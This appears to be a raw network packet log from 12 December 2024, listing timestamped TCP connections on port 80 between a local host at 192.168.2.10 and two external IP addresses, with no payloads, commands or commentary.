Dec 12, 2024 16:48:46.920142889 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.920190096 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.920600891 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.920641899 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.921144009 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.921185970 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.921444893 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.921494007 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.922172070 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.922214031 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.922853947 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.922898054 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.923089981 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.923130989 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.923161030 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.923198938 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.924060106 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.924094915 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.924279928 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.924320936 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.925013065 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.925056934 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.925333977 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.925384998 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.926074982 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.926122904 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.926651955 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.926695108 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.926974058 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.927011013 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.927084923 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.927123070 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.928081989 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.928127050 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.928354979 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.928397894 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.928977966 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.929028034 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.929841042 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.929910898 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.930013895 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.930023909 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.930047989 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.930165052 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.930895090 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.930932045 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.930952072 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.930985928 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.931935072 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.931972980 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.932086945 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.932122946 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.932894945 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.932930946 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.932982922 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.933023930 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.933877945 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.933909893 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.934144020 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.934178114 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.934896946 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.934941053 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.935164928 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.935199022 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.936064005 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.936095953 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.936136007 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.936172009 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.937027931 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.937071085 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.937282085 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.937345028 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.937741995 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.937778950 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.938493967 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.938530922 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.938826084 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.938838959 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.938860893 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.938888073 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.939764977 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.939776897 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.939798117 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.939814091 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.940726995 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.940762997 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.941528082 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.941560030 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.941946030 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.941958904 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.941982985 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.942001104 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.942739010 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.942749977 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.942781925 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.942806005 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.943566084 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.943603992 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.943933964 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.943980932 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.944601059 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.944613934 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.944648981 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.944664955 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.945609093 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.945624113 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.945641041 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.945661068 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.946644068 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.946681023 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.946707010 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.946739912 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.947482109 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.947520018 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.947599888 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.947638035 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.948499918 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.948537111 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.949466944 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.949477911 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.949501038 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.949516058 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.949517965 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.949546099 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.950414896 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.950453043 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.950540066 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.950578928 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.951436043 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.951467037 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.951678038 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.951723099 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.952346087 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.952383995 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.952742100 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.952780008 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.953341961 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.953397036 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.954168081 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.954210997 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.954395056 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.954406023 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.954446077 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.955346107 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.955393076 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.955893040 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.955935001 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.956284046 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.956322908 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.956423998 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.956463099 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.956621885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.956816912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.956897020 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.957118988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.957221031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.957289934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.957392931 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.957434893 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.957510948 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:46.957549095 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:46.957958937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.958113909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.958180904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.959140062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.959644079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.959718943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.959955931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.961061001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.961071014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.961081028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.961129904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.961153030 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.961976051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.962236881 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.962307930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.962986946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.963634014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.963716984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.964009047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.964776993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.964864969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.965029955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.965348959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.965428114 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.968146086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.968306065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.968317032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.968374014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.968385935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.968389034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.968400002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.968417883 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.968444109 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.969125032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.969525099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.969613075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.970185041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.970199108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.970273018 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.971131086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.971273899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.971347094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.972111940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.972424030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.972503901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.973109007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.974206924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.974222898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.974234104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.974298954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.974298954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.975177050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.975459099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.975536108 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.976262093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.977255106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.977269888 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.977355003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.977369070 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.977397919 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.978197098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.978523016 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.978599072 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.979322910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.979334116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.979414940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.980278969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.981065989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.981143951 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.981323957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.981334925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.981411934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.982249022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.982604027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.982686996 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.983382940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.983395100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.983493090 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.984285116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.984616995 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.984699011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.985491991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.985503912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.985589981 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.986443996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.986454010 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.986546993 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.987410069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.987535954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.987613916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.988384008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.989248991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.989325047 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.989460945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.989995956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.990068913 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.990593910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.990998983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.991076946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.991538048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.991549969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.991641998 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.992513895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.992825031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.992902994 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.993654013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.994657993 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.994668961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.994678974 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.994735956 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.994765043 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.995701075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.995969057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.996049881 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.996481895 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.996608973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.996689081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.997493029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.998086929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.998167992 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.998548031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.998558998 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.998646975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:46.999581099 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.999878883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:46.999954939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.000545979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.001559973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.001569033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.001580000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.001636028 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.001713991 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.002556086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.003608942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.003618956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.003649950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.003699064 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.003739119 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.004568100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.005101919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.005191088 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.005620003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.005780935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.005857944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.006624937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.006741047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.006815910 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.007683039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.007694006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.007780075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.008703947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.009253025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.009354115 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.009649992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.056601048 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.098788023 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.098855019 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.098867893 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.098897934 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.099205971 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.099242926 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.099275112 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.099319935 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.100203991 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.100249052 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.100502014 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.100539923 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.101207018 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.101248026 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.101377964 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.101418018 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.102140903 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.102183104 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.102211952 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.102246046 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.103154898 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.103204012 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.103352070 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.103387117 CET	49957	80	192.168.2.10	185.215.113.16
